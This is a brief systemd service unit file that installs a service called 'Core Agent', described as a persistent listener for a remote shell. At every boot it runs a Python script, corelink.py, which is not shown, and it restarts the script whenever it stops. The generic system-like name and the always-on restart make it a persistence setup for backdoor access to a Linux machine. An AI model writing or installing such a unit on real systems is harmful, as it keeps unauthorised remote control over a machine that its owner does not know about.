[Unit]
Description=Core Agent - Persistent Listener for Remote Shell
After=network.target

[Service]
ExecStart=/usr/bin/python /usr/local/bin/corelink.py
Restart=always

[Install]
WantedBy=multi-user.target
